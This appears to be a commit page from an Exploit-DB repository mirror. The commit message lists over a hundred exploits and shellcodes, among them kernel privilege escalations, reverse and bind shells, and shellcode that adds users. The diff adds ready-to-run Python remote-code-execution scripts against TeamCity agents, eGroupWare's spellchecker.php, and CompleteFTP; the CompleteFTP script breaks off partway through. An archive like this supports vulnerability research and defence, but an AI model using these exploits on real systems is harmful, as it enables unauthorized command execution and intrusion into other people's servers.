DB: 2020-07-28

114 changes to exploits/shellcodes Notepad++ < 7.7 (x64) - Denial of Service winrar 5.80 64bit - Denial of Service WinRAR 5.80 (x64) - Denial of Service Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escalation TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017) Microsoft Windows 7 SP1 (x86) - GDI Palette Objects Local Privilege Escalation (MS17-017) Microsoft Word 2007 (x86) - Information Disclosure IKARUS anti.virus 2.16.7 - 'ntguard_x64' Local Privilege Escalation ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution Microsoft Internet Explorer 11 (Windows 7 x86/x64) - vbscript Code Execution Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass) MySQL User-Defined (Linux) (x32/x86_64) - 'sys_exec' Local Privilege Escalation MySQL User-Defined (Linux) (x86) - 'sys_exec' Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation Microsoft Windows (x86/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass) Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Escalation Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH) Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path DEWESoft X3 SP1 (64-bit) - Remote Command Execution DEWESoft X3 SP1 (x64) - Remote Command Execution CompleteFTP Professional 12.1.3 - Remote Code Execution TeamCity Agent XML-RPC 10.0 - Remote Code Execution eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes) FreeBSD x86/x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes) Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes) Linux/x86 - Kill All Processes Shellcode (14 bytes) Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes) Linux/x86 - execve /bin/sh Shellcode (25 bytes) Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes) Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes) Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes) Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes) Linux/x86 - execve /bin/sh Shellcode (25 bytes) Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes) Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes) Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes) Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes) Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes) Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes) Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes) Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes) Linux/x86 - Bind Shell Generator Shellcode (114 bytes) Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes) Linux/x86 - Bind Shell Generator Shellcode (114 bytes) Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes) Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes) Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes) Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes) Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes) Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
2020-07-28 05:01:59 +00:00 · 2020-07-28 05:01:59 +00:00 · 720fabd066
commit 720fabd066
parent e46d9f65ff
42 changed files with 780 additions and 41 deletions
--- a/exploits/linux_x86-64/local/44299.c
+++ b/exploits/linux_x86-64/local/44299.c
--- a/exploits/linux_x86-64/local/44300.c
+++ b/exploits/linux_x86-64/local/44300.c
--- a/exploits/linux_x86-64/local/44302.c
+++ b/exploits/linux_x86-64/local/44302.c
--- a/exploits/linux_x86-64/local/45516.c
+++ b/exploits/linux_x86-64/local/45516.c
--- a/exploits/linux_x86/local/46249.py
+++ b/exploits/linux_x86/local/46249.py
--- a/exploits/php/webapps/48201.py
+++ b/exploits/php/webapps/48201.py
@ -0,0 +1,353 @@
 # Exploit Title: TeamCity Agent XML-RPC 10.0 - Remote Code Execution
 # Date: 2020-03-20
 # Exploit Author: Dylan Pindur
 # Vendor Homepage: https://www.jetbrains.com/teamcity/
 # Version: TeamCity < 10.0 (42002)
 # Tested on: Windows 10 (x64)
 # References:
 # https://www.exploit-db.com/exploits/45917
 # https://www.tenable.com/plugins/nessus/94675
 #
 # TeamCity Agents configured to use bidirectional communication allow the execution
 # of commands sent to them via an XML-RPC endpoint.
 #
 # This script requires the following python modules are installed
 # pip install requests
 # 
 #!/usr/local/bin/python3
 import requests
 import sys
 # region tc7
 teamcity_7_req = """
 <?xml version="1.0" encoding="UTF-8"?>
 <methodCall>
  <methodName>buildAgent.runBuild</methodName>
  <params>
    <param>
      <value>
        <![CDATA[
          <AgentBuild>
            <myBuildId>123456</myBuildId>
            <myBuildTypeId>x</myBuildTypeId>
            <myCheckoutType>ON_AGENT</myCheckoutType>
            <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>
            <myServerParameters class="tree-map">
              <no-comparator/>
              <entry>
                <string>system.build.number</string>
                <string>0</string>
              </entry>
            </myServerParameters>
            <myVcsRootOldRevisions class="tree-map">
              <no-comparator/>
            </myVcsRootOldRevisions>
            <myVcsRootCurrentRevisions class="tree-map">
              <no-comparator/>
            </myVcsRootCurrentRevisions>
            <myAccessCode/>
            <myArtifactDependencies/>
            <myArtifactPaths/>
            <myBuildTypeOptions/>
            <myFullCheckoutReasons/>
            <myPersonalVcsChanges/>
            <myUserBuildParameters/>
            <myVcsChanges/>
            <myVcsRootEntries/>
            <myBuildRunners>
              <jetbrains.buildServer.agentServer.BuildRunnerData>
                <myRunType>simpleRunner</myRunType>
                <myRunnerName>x</myRunnerName>
                <myRunnerParameters class="tree-map">
                  <no-comparator/>
                  <entry>
                    <string>script.content</string>
                    <string>{SCRIPT}</string>
                  </entry>
                  <entry>
                    <string>teamcity.step.mode</string>
                    <string>default</string>
                  </entry>
                  <entry>
                    <string>use.custom.script</string>
                    <string>true</string>
                  </entry>
                </myRunnerParameters>
                <myServerParameters class="tree-map">
                  <no-comparator/>
                  <entry>
                    <string>teamcity.build.step.name</string>
                    <string>x</string>
                  </entry>
                </myServerParameters>
              </jetbrains.buildServer.agentServer.BuildRunnerData>
            </myBuildRunners>
            <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>
            <myBuildFeatures/>
          </AgentBuild>
        ]]>
      </value>
    </param>
  </params>
 </methodCall>
 """.strip()
 # endregion
 # region tc8
 teamcity_8_req = """
 <?xml version="1.0" encoding="UTF-8"?>
 <methodCall>
  <methodName>buildAgent.runBuild</methodName>
  <params>
    <param>
      <value>
        <![CDATA[
          <AgentBuild>
            <myBuildId>123456</myBuildId>
            <myBuildTypeId>x</myBuildTypeId>
            <myCheckoutType>ON_AGENT</myCheckoutType>
            <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>
            <myServerParameters class="tree-map">
              <entry>
                <string>system.build.number</string>
                <string>0</string>
              </entry>
            </myServerParameters>
            <myAccessCode/>
            <myArtifactDependencies/>
            <myArtifactPaths/>
            <myBuildTypeOptions/>
            <myFullCheckoutReasons/>
            <myPersonalVcsChanges/>
            <myUserBuildParameters/>
            <myVcsChanges/>
            <myVcsRootCurrentRevisions class="tree-map"/>
            <myVcsRootEntries/>
            <myVcsRootOldRevisions class="tree-map"/>
            <myBuildRunners>
              <jetbrains.buildServer.agentServer.BuildRunnerData>
                <myId>x</myId>
                <myIsDisabled>false</myIsDisabled>
                <myRunType>simpleRunner</myRunType>
                <myRunnerName>x</myRunnerName>
                <myChildren class="list"/>
                <myServerParameters class="tree-map">
                    <entry>
                      <string>teamcity.build.step.name</string>
                      <string>x</string>
                    </entry>
                  </myServerParameters>
                <myRunnerParameters class="tree-map">
                  <entry>
                    <string>script.content</string>
                    <string>{SCRIPT}</string>
                  </entry>
                  <entry>
                    <string>teamcity.step.mode</string>
                    <string>default</string>
                  </entry>
                  <entry>
                    <string>use.custom.script</string>
                    <string>true</string>
                  </entry>
                  </myRunnerParameters>
                </jetbrains.buildServer.agentServer.BuildRunnerData>
            </myBuildRunners>
            <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>
            <myBuildFeatures/>
          </AgentBuild>
        ]]>
      </value>
    </param>
  </params>
 </methodCall>
 """.strip()
 # endregion
 # region tc9
 teamcity_9_req = """
 <?xml version="1.0" encoding="UTF-8"?>
 <methodCall>
  <methodName>buildAgent.runBuild</methodName>
  <params>
    <param>
      <value>
        <![CDATA[
          <AgentBuild>
            <myBuildId>123456</myBuildId>
            <myBuildTypeId>x</myBuildTypeId>
            <myBuildTypeExternalId>x</myBuildTypeExternalId>
            <myCheckoutType>ON_AGENT</myCheckoutType>
            <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>
            <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>
            <myServerParameters class="StringTreeMap">
              <k>system.build.number</k>
              <v>0</v>
            </myServerParameters>
            <myAccessCode/>
            <myArtifactDependencies/>
            <myArtifactPaths/>
            <myBuildFeatures/>
            <myBuildTypeOptions/>
            <myFullCheckoutReasons/>
            <myPersonalVcsChanges/>
            <myUserBuildParameters/>
            <myVcsChanges/>
            <myVcsRootCurrentRevisions class="tree-map"/>
            <myVcsRootEntries/>
            <myVcsRootOldRevisions class="tree-map"/>
            <myBuildRunners>
              <jetbrains.buildServer.agentServer.BuildRunnerData>
                <myId>x</myId>
                <myIsDisabled>false</myIsDisabled>
                <myRunType>simpleRunner</myRunType>
                <myRunnerName>x</myRunnerName>
                <myChildren class="list"/>
                <myServerParameters class="tree-map">
                  <entry>
                    <string>teamcity.build.step.name</string>
                    <string>x</string>
                  </entry>
                </myServerParameters>
                <myRunnerParameters class="tree-map">
                  <entry>
                    <string>script.content</string>
                    <string>{SCRIPT}</string>
                  </entry>
                  <entry>
                    <string>teamcity.step.mode</string>
                    <string>default</string>
                  </entry>
                  <entry>
                    <string>use.custom.script</string>
                    <string>true</string>
                  </entry>
                </myRunnerParameters>
              </jetbrains.buildServer.agentServer.BuildRunnerData>
            </myBuildRunners>
          </AgentBuild>
        ]]>
      </value>
    </param>
  </params>
 </methodCall>
 """.strip()
 # endregion
 # region tc10
 teamcity_10_req = """
 <?xml version="1.0" encoding="UTF-8"?>
 <methodCall>
  <methodName>buildAgent.runBuild</methodName>
  <params>
    <param>
      <value>
        <![CDATA[
          <AgentBuild>
            <myBuildId>123456</myBuildId>
            <myBuildTypeId>x</myBuildTypeId>
            <myBuildTypeExternalId>x</myBuildTypeExternalId>
            <myCheckoutType>ON_AGENT</myCheckoutType>
            <myVcsSettingsHashForServerCheckout>x</myVcsSettingsHashForServerCheckout>
            <myVcsSettingsHashForAgentCheckout>123456</myVcsSettingsHashForAgentCheckout>
            <myVcsSettingsHashForManualCheckout>x</myVcsSettingsHashForManualCheckout>
            <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>
            <myServerParameters class="StringTreeMap">
              <k>system.build.number</k>
              <v>0</v>
            </myServerParameters>
            <myAccessCode/>
            <myArtifactDependencies/>
            <myArtifactPaths/>
            <myBuildFeatures/>
            <myBuildTypeOptions/>
            <myFullCheckoutReasons/>
            <myParametersSpecs class="StringTreeMap"/>
            <myPersonalVcsChanges/>
            <myUserBuildParameters/>
            <myVcsChanges/>
            <myVcsRootCurrentRevisions class="tree-map"/>
            <myVcsRootEntries/>
            <myVcsRootOldRevisions class="tree-map"/>
            <myBuildRunners>
              <jetbrains.buildServer.agentServer.BuildRunnerData>
                <myId>x</myId>
                <myIsDisabled>false</myIsDisabled>
                <myRunType>simpleRunner</myRunType>
                <myRunnerName>x</myRunnerName>
                <myChildren class="list"/>
                <myServerParameters class="tree-map">
                  <entry>
                    <string>teamcity.build.step.name</string>
                    <string>x</string>
                  </entry>
                </myServerParameters>
                <myRunnerParameters class="tree-map">
                  <entry>
                    <string>script.content</string>
                    <string>{SCRIPT}</string>
                  </entry>
                  <entry>
                    <string>teamcity.step.mode</string>
                    <string>default</string>
                  </entry>
                  <entry>
                    <string>use.custom.script</string>
                    <string>true</string>
                  </entry>
                </myRunnerParameters>
              </jetbrains.buildServer.agentServer.BuildRunnerData>
            </myBuildRunners>
          </AgentBuild>
        ]]>
      </value>
    </param>
  </params>
 </methodCall>
 """.strip()
 # endregion
 def prepare_payload(version, cmd):
    if version == 7:
        return teamcity_7_req.replace("{SCRIPT}", "cmd /c {}".format(cmd))
    elif version == 8:
        return teamcity_8_req.replace("{SCRIPT}", "cmd /c {}".format(cmd))
    elif version == 9:
        return teamcity_9_req.replace("{SCRIPT}", "cmd /c {}".format(cmd))
    elif version == 10:
        return teamcity_10_req.replace("{SCRIPT}", "cmd /c {}".format(cmd))
    else:
        raise Exception("No payload available for version {}".format(version))
 def send_req(host, port, payload):
    headers = {
        "Content-Type": "text/xml"
    }
    url = "http://{}:{}/".format(host, port)
    r = requests.post(url, headers=headers, data=payload)
    if r.status_code == 200 and 'fault' not in r.text:
        print('Command sent successfully')
    else:
        print('Command failed')
        print(r.text)
 if len(sys.argv) != 4:
    print('[!] Missing arguments')
    print('[ ] Usage: {} <target> <port> <cmd>'.format(sys.argv[0]))
    print("[ ] E.g. {} 192.168.1.128 9090 'whoami > C:\\x.txt'".format(sys.argv[0]))
    sys.exit(1)
 target = sys.argv[1]
 port = int(sys.argv[2])
 cmd = sys.argv[3]
 version = input("Enter TeamCity version (7,8,9,10): ")
 version = int(version.strip())
 if version not in [7, 8, 9, 10]:
    print("Please select a valid version (7,8,9,10)")
    sys.exit(1)
 payload = prepare_payload(version, cmd)
 send_req(target, str(port), payload)
--- a/exploits/php/webapps/48720.py
+++ b/exploits/php/webapps/48720.py
@ -0,0 +1,51 @@
 # Exploit Title: eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution
 # Date: 2020-07-27
 # Exploit Author: Berk KIRAS
 # Vendor Homepage: https://www.egroupware.org/en/
 # Version: 1.14
 # Tested on: Apache
 # Berk KIRAS PwC - Cyber Security Specialist 
 #!/usr/bin/python3
 import requests
 import sys
 import threading
 import urllib
 def send_req(command):
        #Headers
        my_datas_headers ={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0",
            "Accept": "text/javascript, text/html, application/xml, text/xml, */*",
            "Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Content-type": "application/json; charset=UTF-8",
            "Connection": "close",
        }
        #If you want to edit and add headers some headers added
        s = requests.session()
       #if you want simple-> headers={'User-Agent': 'Mozilla', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'}
        s.headers.update(my_datas_headers)
        params={"q":"||"+command+"||"}
        command_encoded = urllib.urlencode(params)
        command_encoded = command_encoded.split("=")[1]
        r = s.get(sys.argv[1]+"://"+sys.argv[2]+"/egroupware/phpgwapi/js/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/"+"spellchecker.php?spellchecker_lang=egroupware_spellchecker_cmd_exec.nasl"+command_encoded)
        return r.content
 def main():
    if(len(sys.argv) < 3): 
        print("Usage:exploit.py <http/s> <IP> ")
        sys.exit(0)
    else:
        try:
            while True:
                cmd = raw_input("CMD_>")
                resp=send_req(cmd).split(";")[5].split("2>&1")[1]
                print(resp)
        except Exception:
            print(Exception)
 main()
--- a/exploits/windows/remote/48657.py
+++ b/exploits/windows/remote/48657.py
@ -0,0 +1,332 @@
 # Exploit Title: CompleteFTP Professional 12.1.3 - Remote Code Execution
 # Date: 2020-03-11
 # Exploit Author: 1F98D
 # Original Author: Rhino Security Labs
 # Vendor Homepage: https://enterprisedt.com/products/completeftp/
 # Version: CompleteFTP Professional
 # Tested on: Windows 10 (x64)
 # CVE: CVE‑2019‑16116
 # References:
 # https://rhinosecuritylabs.com/application-security/completeftp-server-local-privesc-cve-2019-16116/
 # https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2019-16116
 #
 # CompleteFTP before 12.1.3 logs an obscured administrator password to a file
 # during installation (C:\Program Files (x86)\Complete FTP\Server\Bootstrapper.log)
 # if CompleteFTP is configured to permit remote administration (over port 14983) it
 # is possible to obtain remote code execution through the administration interface
 #
 # This script requires the following python modules are installed
 # pip install paramiko pycryptodome uuid
 # 
 #!/usr/local/bin/python3
 from paramiko.sftp import CMD_EXTENDED
 from base64 import b64encode, b64decode
 from Crypto.Util.Padding import unpad
 from Crypto.Cipher import DES3
 import xml.etree.ElementTree as ET
 import paramiko
 import struct
 import uuid
 import sys
 # region get_server_info
 get_server_info = """
 <SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
 <i2:GetServerInfo id="ref-1" xmlns:i2="Admin API">
 </i2:GetServerInfo>
 </SOAP-ENV:Body>
 </SOAP-ENV:Envelope>
 """.strip()
 # endregion
 # region update_config
 update_config = """
 <SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
 <SOAP-ENV:Body>
 <i2:UpdateConfig id="ref-1" xmlns:i2="Admin API">
 <changes href="#ref-4"/>
 </i2:UpdateConfig>
 <a1:ConfigDataSet id="ref-4" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/EnterpriseDT.Net.FtpServer.Config/CompleteFTPManager%2C%20Version%3D8.3.3.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D48e55b33069804ce">
 <DataSet.RemotingVersion href="#ref-5"/>
 <XmlSchema id="ref-6">{XMLSCHEMA}</XmlSchema>
 <XmlDiffGram id="ref-7">{XMLDIFFGRAM}</XmlDiffGram>
 </a1:ConfigDataSet>
 <a2:Version id="ref-5" xmlns:a2="http://schemas.microsoft.com/clr/ns/System">
 <_Major>2</_Major>
 <_Minor>0</_Minor>
 <_Build>-1</_Build>
 <_Revision>-1</_Revision>
 </a2:Version>
 </SOAP-ENV:Body>
 </SOAP-ENV:Envelope>
 """.strip()
 # endregion
 # region xml_schema
 xml_schema = """
 <?xml version="1.0" encoding="utf-16"?>
 <xs:schema id="ConfigDataSet" targetNamespace="http://tempuri.org/ConfigDataSet.xsd" xmlns:mstns="http://tempuri.org/ConfigDataSet.xsd" xmlns="http://tempuri.org/ConfigDataSet.xsd" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:msprop="urn:schemas-microsoft-com:xml-msprop" attributeFormDefault="qualified" elementFormDefault="qualified">
  <xs:element name="ConfigDataSet" msdata:IsDataSet="true" msdata:Locale="en-US" msdata:TimestampingEnabled="False">
    <xs:complexType>
      <xs:choice minOccurs="0" maxOccurs="unbounded">
        <xs:element name="PlugIn">
          <xs:complexType>
            <xs:sequence>
              <xs:element name="PlugInID" msdata:DataType="System.Guid, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:string" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
              <xs:element name="Name" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd">
                <xs:simpleType>
                  <xs:restriction base="xs:string">
                    <xs:maxLength value="100" />
                  </xs:restriction>
                </xs:simpleType>
              </xs:element>
              <xs:element name="ClassName" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd">
                <xs:simpleType>
                  <xs:restriction base="xs:string">
                    <xs:maxLength value="400" />
                  </xs:restriction>
                </xs:simpleType>
              </xs:element>
              <xs:element name="PlugInTypeID" type="xs:int" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
              <xs:element name="Configuration" type="xs:string" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" />
              <xs:element name="CreatedTime" type="xs:dateTime" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
              <xs:element name="ModifiedTime" type="xs:dateTime" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
              <xs:element name="UserInstance" type="xs:boolean" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" />
              <xs:element name="System" type="xs:boolean" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
              <xs:element name="EditorClassName" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0">
                <xs:simpleType>
                  <xs:restriction base="xs:string">
                    <xs:maxLength value="100" />
                  </xs:restriction>
                </xs:simpleType>
              </xs:element>
              <xs:element name="AssemblyPath" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0">
              </xs:element>
              <xs:element name="MinimumEdition" type="xs:int" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" />
              <xs:element name="ChangeSetID" msdata:DataType="System.Guid, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:string" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" />
            </xs:sequence>
          </xs:complexType>
        </xs:element>
        <xs:element name="Server">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="SiteUser">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="Site">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="Node">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="TrashHeap1">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="TrashHeap2">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="ChangeSet">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
        <xs:element name="RuntimeVariable">
          <xs:complexType>
          </xs:complexType>
        </xs:element>
      </xs:choice>
    </xs:complexType>
    <xs:unique name="PlugIn_Constraint1" msdata:ConstraintName="Constraint1" msdata:PrimaryKey="true">
      <xs:selector xpath=".//mstns:PlugIn" />
      <xs:field xpath="mstns:PlugInID" />
    </xs:unique>
  </xs:element>
 </xs:schema>
 """.replace("<", "<").replace(">", ">").replace('"', """).strip()
 # endregion
 # region xml_diffgram
 xml_diffgram = """
 <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
  <ConfigDataSet xmlns="http://tempuri.org/ConfigDataSet.xsd">
    <PlugIn diffgr:id="PlugIn1" msdata:rowOrder="0" diffgr:hasChanges="modified">
      <PlugInID>88428040-73b3-4497-9b6d-69af2f1cc3c7</PlugInID>
      <Name>Process Execution</Name>
      <ClassName>EnterpriseDT.Net.FtpServer.Trigger.ProcessTrigger</ClassName>
      <PlugInTypeID>2</PlugInTypeID>
      <Configuration>{CONFIGURATION}</Configuration>
      <CreatedTime>2020-03-10T18:33:41.107+08:00</CreatedTime>
      <ModifiedTime>2020-03-10T10:52:00.7496654+08:00</ModifiedTime>
      <UserInstance>false</UserInstance>
      <System>true</System>
      <ChangeSetID>{ID}</ChangeSetID>
    </PlugIn>
    <PlugInType diffgr:id="PlugInType1" msdata:rowOrder="0">
      <PlugInTypeID>2</PlugInTypeID>
      <Name>Event</Name>
      <CreatedTime>2009-06-29T11:48:00+08:00</CreatedTime>
      <ModifiedTime>2009-06-29T11:48:00+08:00</ModifiedTime>
    </PlugInType>
    <ChangeSet diffgr:id="ChangeSet1" msdata:rowOrder="0">
      <ChangeSetID></ChangeSetID>
      <Sequence>3</Sequence>
      <CreatedTime>2020-03-10T10:50:44.4209655+08:00</CreatedTime>
      <ModifiedTime>2020-03-10T10:50:44.4209655+08:00</ModifiedTime>
      <IsPrimary>true</IsPrimary>
    </ChangeSet>
  </ConfigDataSet>
  <diffgr:before>
    <PlugIn diffgr:id="PlugIn1" msdata:rowOrder="0" xmlns="http://tempuri.org/ConfigDataSet.xsd">
      <PlugInID>88428040-73b3-4497-9b6d-69af2f1cc3c7</PlugInID>
      <Name>Process Execution</Name>
      <ClassName>EnterpriseDT.Net.FtpServer.Trigger.ProcessTrigger</ClassName>
      <PlugInTypeID>2</PlugInTypeID>
      <Configuration></Configuration>
      <CreatedTime>2020-03-10T18:33:41.107+08:00</CreatedTime>
      <ModifiedTime>2020-03-10T10:50:44.4209655+08:00</ModifiedTime>
      <UserInstance>false</UserInstance>
      <System>true</System>
      <ChangeSetID></ChangeSetID>
    </PlugIn>
  </diffgr:before>
 </diffgr:diffgram>
 """.strip()
 # endregion
 # region config
 config = """
 <TriggerDataSet xmlns="http://tempuri.org/TriggerDataSet.xsd">
    <ProcessConfig>
        <ProcessConfigID>0</ProcessConfigID>
        <MaxProcesses>10</MaxProcesses>
        <RunTimeout>0</RunTimeout>
        <QueueTimeout>0</QueueTimeout>
        <KillOnExit>true</KillOnExit>
    </ProcessConfig>
    <ProcessRule>
        <ProcessRuleID>1</ProcessRuleID>
        <ProcessConfigID>0</ProcessConfigID>
        <Name>trigger</Name>
        <Enabled>true</Enabled>
        <ProcessType>0</ProcessType>
        <ProcessPath>cmd.exe</ProcessPath>
        <Arguments>/c {CMD}</Arguments>
        <PathFilter>*</PathFilter>
        <OnError>false</OnError>
        <OnSuccess>true</OnSuccess>
        <RowOrder>1</RowOrder>
    </ProcessRule>
    <ProcessEvent>
        <ProcessRuleID>1</ProcessRuleID>
        <EventType>LogIn</EventType>
    </ProcessEvent>
 </TriggerDataSet>
 """.strip()
 # endregion
 def prepare_update_config(uuid, cmd):
    config_payload = config
    config_payload = config_payload.replace('{CMD}', cmd)
    config_payload = config_payload.replace('<', '<')
    config_payload = config_payload.replace('>', '>')
    diffgram_payload = xml_diffgram
    diffgram_payload = diffgram_payload.replace('{CONFIGURATION}', config_payload)
    diffgram_payload = diffgram_payload.replace('{ID}', uuid)
    diffgram_payload = diffgram_payload.replace('&', '&')
    diffgram_payload = diffgram_payload.replace('<', '<')
    diffgram_payload = diffgram_payload.replace('>', '>')
    diffgram_payload = diffgram_payload.replace('"', '"')
    payload = update_config
    payload = payload.replace('{XMLSCHEMA}', xml_schema)
    payload = payload.replace('{XMLDIFFGRAM}', diffgram_payload)
    return payload
 def send_request(sftp, payload):
    payload = b64encode(bytes(payload, 'utf-8')).decode('utf-8')
    res = sftp._request(CMD_EXTENDED, 'admin@enterprisedt.com', 'SOAP64 ' + payload)
    return res
 def convert_changeset_id_to_uuid(changeset_id):
